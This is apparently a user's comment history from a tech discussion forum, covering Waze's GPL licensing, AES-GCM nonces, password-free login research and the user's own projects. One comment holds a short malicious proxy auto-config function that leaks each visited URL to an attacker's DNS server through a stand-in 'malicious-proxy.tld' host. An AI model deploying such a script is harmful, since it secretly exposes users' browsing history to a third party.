980 karma · joined April 10, 2012
See https://www.ft.com/content/87d8a7e8-cfe8-11e6-b06b-680c49b4b...
I basically just check my twitter account daily (also follow many great researchers who have twitter accounts :))
function FindProxyForURL(url, host) {
return "PROXY " + base64(url) + ".malicious-proxy.tld:1080";
}
Then the attacker can look at his/her DNS server query log and figure out the URL.Originally, the source code of Waze clients was released under GPL, which AFAIR it was as branded as a part of the community-based map app.
But the company chose to not release the source code after v3.0. This is quoted from one of my emails.
In reply to your inquiry "Hi, where can we get the latest waze code?":
Thank you for your feedback.
You can find source code for the old versions (up to 2.4) on our wiki - waze.com/wiki
Version 3.0 and higher are no longer under GPL, and at the moment we are still considering if and how we will share the code for these versions.
Best regards,
I guess Waze either 1) has obtained the agreements of all open-source contributors, or 2) has completely rewritten all related source code.For example, for this case of GAE, you can use
Naked domains <=> CloudFront <=> GAEI am curious if this is common in startup companies, since I have never worked in startups.
See the article [1] on the website of Xinhuanet [2].
[1] http://news.xinhuanet.com/fortune/2013-12/17/c_125874796.htm
After reaching out to the Play team, their feedback was that though application itself is harmless, and not actually in violation of their Terms of Service,...
But even without the 4 bytes, 64-bit nonce seems enough for me, as long as it's not chosen at random.
For comparison, if the nonce is chosen randomly, the security level is only 2^32 (supposing the 4 bytes based on the key materials remain unchanged).
I don't know how do you integrate AES-GCM with TLS, but I have to say
1. The secure AES-GCM supports 96-bit nonces. It's 12 bytes, not 8 bytes mentioned in the article.
2. Nonce is nonce. It shouldn't be chosen at random (as random IVs). As long as nonces are not reused, GCM should be secure.
3. I don't believe implementing a secure random number generator is more efficient than maintaining an incremental counter.
Edited for typos
I still miss the feeling about using BBM. I guess the backend service part of RIM/Blackberry is still somehow ahead of other manufacturers.
We just submitted a research paper 2 weeks ago to SPSM'13 (http://www.spsm-workshop.org/2013/). We proposed a password-free login system, of which Twitter's new 2-factor auth solution is a special case. We also discussed about the solutions to vender lock-in and 2-factor auth in the paper.
I put the paper in public for interested readers. You can download it from http://about.bozhu.me/paper/loxin.pdf
PS. We did a conceptual Android app about password-free mobile payment, under the same idea, in last year when we participating in the MintChipChallenge by the Royal Canadian Mint. The source code is available at https://github.com/Xecurity/EasyChip
It supports listing gists with specific tags, such as "blog" (along with other features, e.g. custom css/js/html and latex)
Home page: http://jist.in
Source code: https://github.com/zhuzhuor/jist/
Why do you so emphasize Microsoft in the title? Because it's Microsoft?
Now it's still not fixed in my case. What happened to github?
I know what it is based on, except the implementation details.
My question was what's the mechanism to verify the code refreshed every time the screen is turn on (which is a little different from other authenticators).